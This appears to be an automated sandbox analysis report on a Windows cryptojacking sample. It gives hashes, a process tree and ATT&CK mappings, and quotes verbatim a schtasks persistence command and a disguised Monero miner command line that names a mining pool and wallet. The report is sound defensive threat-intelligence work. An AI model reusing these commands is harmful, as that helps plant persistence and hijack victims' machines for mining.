95c9da676ea55732ef64df170d6507415effefd9cc174dd598ec3afc58ee0afd

Analysis

max time kernel
42s
max time network
133s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
07/09/2024, 12:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

95c9da676ea55732ef64df170d6507415effefd9cc174dd598ec3afc58ee0afd.exe
Size

2.1MB
MD5

8318090a1d656a598d5ef543f1af2e18
SHA1

e36d0199bf7d45fcdcbb0bdb9f66f93830a27220
SHA256

95c9da676ea55732ef64df170d6507415effefd9cc174dd598ec3afc58ee0afd
SHA512

8b0c941b0e89dcf7e5cbd8853fee8a31bbe269f887effe0cb162c60723b73a5280e1c987fab5f046956a73cb599c05cd215b4f0e8caa8246cfbb468584eabddd
SSDEEP

49152:aG2hLAFOQmeldieQkEm/V+UIwkleTklJdsIpcQ53xitGDT:aGWgNfQkEKVkleTkps7QFwtGD

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 1 IoCs

pid	Process
2944	se64.exe

Loads dropped DLL 2 IoCs

pid	Process
2444	cmd.exe
2444	cmd.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2440	schtasks.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2548	conhost.exe
1640	conhost.exe
1640	conhost.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2548	conhost.exe
Token: SeDebugPrivilege	1640	conhost.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 1564 wrote to memory of 2548	1564	95c9da676ea55732ef64df170d6507415effefd9cc174dd598ec3afc58ee0afd.exe	29
PID 1564 wrote to memory of 2548	1564	95c9da676ea55732ef64df170d6507415effefd9cc174dd598ec3afc58ee0afd.exe	29
PID 1564 wrote to memory of 2548	1564	95c9da676ea55732ef64df170d6507415effefd9cc174dd598ec3afc58ee0afd.exe	29
PID 1564 wrote to memory of 2548	1564	95c9da676ea55732ef64df170d6507415effefd9cc174dd598ec3afc58ee0afd.exe	29
PID 2548 wrote to memory of 2536	2548	conhost.exe	31
PID 2548 wrote to memory of 2536	2548	conhost.exe	31
PID 2548 wrote to memory of 2536	2548	conhost.exe	31
PID 2536 wrote to memory of 2440	2536	cmd.exe	33
PID 2536 wrote to memory of 2440	2536	cmd.exe	33
PID 2536 wrote to memory of 2440	2536	cmd.exe	33
PID 2548 wrote to memory of 2444	2548	conhost.exe	34
PID 2548 wrote to memory of 2444	2548	conhost.exe	34
PID 2548 wrote to memory of 2444	2548	conhost.exe	34
PID 2444 wrote to memory of 2944	2444	cmd.exe	36
PID 2444 wrote to memory of 2944	2444	cmd.exe	36
PID 2444 wrote to memory of 2944	2444	cmd.exe	36
PID 2944 wrote to memory of 1640	2944	se64.exe	37
PID 2944 wrote to memory of 1640	2944	se64.exe	37
PID 2944 wrote to memory of 1640	2944	se64.exe	37
PID 2944 wrote to memory of 1640	2944	se64.exe	37

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\95c9da676ea55732ef64df170d6507415effefd9cc174dd598ec3afc58ee0afd.exe
"C:\Users\Admin\AppData\Local\Temp\95c9da676ea55732ef64df170d6507415effefd9cc174dd598ec3afc58ee0afd.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1564
- C:\Windows\System32\conhost.exe
  "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\95c9da676ea55732ef64df170d6507415effefd9cc174dd598ec3afc58ee0afd.exe"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2548
- - C:\Windows\System32\cmd.exe
    "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "se64" /tr "C:\Users\Admin\AppData\Local\Temp\se64.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2536
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /f /sc onlogon /rl highest /tn "se64" /tr "C:\Users\Admin\AppData\Local\Temp\se64.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2440
- - C:\Windows\System32\cmd.exe
    "cmd" cmd /c "C:\Users\Admin\AppData\Local\Temp\se64.exe"
    3⤵
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:2444
  - - C:\Users\Admin\AppData\Local\Temp\se64.exe
      C:\Users\Admin\AppData\Local\Temp\se64.exe
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:2944
    - - C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\se64.exe"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1640
      - C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        6⤵
        
        PID:2936
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "/sihost64"
        7⤵
        
        PID:2392
      - C:\Windows\System32\nslookup.exe
        
        C:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=auto.c3pool.org:19999 --user=41qBGWTRXUoUMGXsr78Aie3LYCBSDGZyaQeceMxn11qi9av1adZqsVWCrUwhhwqrt72qTzMbweeqMbA89mnFepja9XERfHL --pass=TF --cpu-max-threads-hint=40 --cinit-idle-wait=5 --cinit-idle-cpu=80
        6⤵
        
        PID:1440

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\se64.exe

Filesize
1022KB

MD5
c500e90157d275f54ae79e6b91e0f7a6

SHA1
e0fa3c97925b06147ec10c5ffa346b1d8d0067ee

SHA256
18579fa3167c53a1f5873326fa264d82a2890782f92e46699f9e6c7b91ec68ca

SHA512
8ae5bd041e07cbd74d8aa19d976e2a41d74150dd2deda880f1e5a81ce724bbd1b8c116f5c6842ec9eaaa65e7507788ddfff73f59d63569f357990a47cfa78909

Download Submit
C:\Users\Admin\AppData\Local\Temp\se64.exe

Filesize
513KB

MD5
89b35faa12a9246bc16484332e04d820

SHA1
85ed0f8e409fe41656bd41ad6bde952f8e2113db

SHA256
2896847b17bd120dff1c3baab0a9a946e61b8f5c5ee11170b7cc5f3b1dbededc

SHA512
52875d6e3e182aad7bc236b8c00b6737eb3b20910eb4f1938321d42f05e29c5f909e28a47dea542927824660bb05fa85a30a46149c97ebaea3dd18b9e2c4678c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

Filesize
31KB

MD5
7ddc6864727e3752169b30c77b1a8480

SHA1
382f0d4f6959ee57d6afea168a522ba0ddd49f0b

SHA256
0e59cfc54677063a479f6327a459c2bca82b1d0635baf6ab43df2e6cbc8a568d

SHA512
10f96b3d44c0fc0250dbfaf519e18bcfc12189b7a2a4d443abbaa94913d7948249ece853afa45f3e4318587f7c374d0b238c45fc40a938846f82282375097285

Download Submit
\Users\Admin\AppData\Local\Temp\se64.exe

Filesize
592KB

MD5
4a6760327af4a6cc2e9e10bdf8b0d7e4

SHA1
95ad58043fe1c951e0fd3d06a1e9207482928171

SHA256
a1bc16cd779deaa7a387dea92bf678e414652fdc580c22b785d2367b745cee6e

SHA512
9044b13e3cd9291e0408ad8f823f820cc377685f5592c10671004186d0abf6821b6dafe0d069a80ba428ca06f4d0c6ca738c8da68a3960837e38539612190b27

Download Submit
\Users\Admin\AppData\Local\Temp\se64.exe

Filesize
764KB

MD5
5e91e4d2663907d9eccfb5da4afe670a

SHA1
93b329557342ca6a1dd2c5c4de7c41ee4a2467ab

SHA256
7e6df20fc266deb53b1b3b1e1a06100c3f867b02f650978ef71e2b9d0828a0b7

SHA512
b0faf65c7f8ee7d25f10a49309afcdceb04cdbf1ca4f2385bfa4fb3aa50a875244c7bf06f10cb42d1136e15655edded4991dd79281b8ba310bb1ad0014d1e226

Download Submit
memory/1440-48-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1440-57-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1440-33-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1440-36-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1440-54-0x000007FFFFFDF000-0x000007FFFFFE0000-memory.dmp

Filesize
4KB

Download
memory/1440-67-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1440-66-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1440-55-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1440-58-0x0000000000170000-0x0000000000190000-memory.dmp

Filesize
128KB

Download
memory/1440-65-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1440-34-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1440-38-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1440-40-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1440-30-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1440-51-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1440-53-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1440-42-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1440-44-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1440-63-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1440-64-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1440-62-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1440-61-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1440-60-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1440-46-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1640-19-0x000007FEF4DF0000-0x000007FEF57DC000-memory.dmp

Filesize
9.9MB

Download
memory/1640-59-0x000007FEF4DF0000-0x000007FEF57DC000-memory.dmp

Filesize
9.9MB

Download
memory/1640-29-0x000007FEF4DF0000-0x000007FEF57DC000-memory.dmp

Filesize
9.9MB

Download
memory/1640-28-0x000007FEF4DF0000-0x000007FEF57DC000-memory.dmp

Filesize
9.9MB

Download
memory/1640-17-0x000007FEF4DF0000-0x000007FEF57DC000-memory.dmp

Filesize
9.9MB

Download
memory/2392-70-0x0000000000220000-0x0000000000226000-memory.dmp

Filesize
24KB

Download
memory/2392-69-0x0000000000060000-0x0000000000066000-memory.dmp

Filesize
24KB

Download
memory/2548-3-0x000007FEF57E0000-0x000007FEF61CC000-memory.dmp

Filesize
9.9MB

Download
memory/2548-0-0x00000000000A0000-0x00000000002C0000-memory.dmp

Filesize
2.1MB

Download
memory/2548-4-0x000007FEF57E0000-0x000007FEF61CC000-memory.dmp

Filesize
9.9MB

Download
memory/2548-15-0x000007FEF57E0000-0x000007FEF61CC000-memory.dmp

Filesize
9.9MB

Download
memory/2548-5-0x000007FEF57E0000-0x000007FEF61CC000-memory.dmp

Filesize
9.9MB

Download
memory/2548-7-0x000007FEF57E3000-0x000007FEF57E4000-memory.dmp

Filesize
4KB

Download
memory/2548-8-0x000007FEF57E0000-0x000007FEF61CC000-memory.dmp

Filesize
9.9MB

Download
memory/2548-6-0x000007FEF57E0000-0x000007FEF61CC000-memory.dmp

Filesize
9.9MB

Download
memory/2548-2-0x000000001B3B0000-0x000000001B5D0000-memory.dmp

Filesize
2.1MB

Download
memory/2548-1-0x000007FEF57E3000-0x000007FEF57E4000-memory.dmp

Filesize
4KB

Download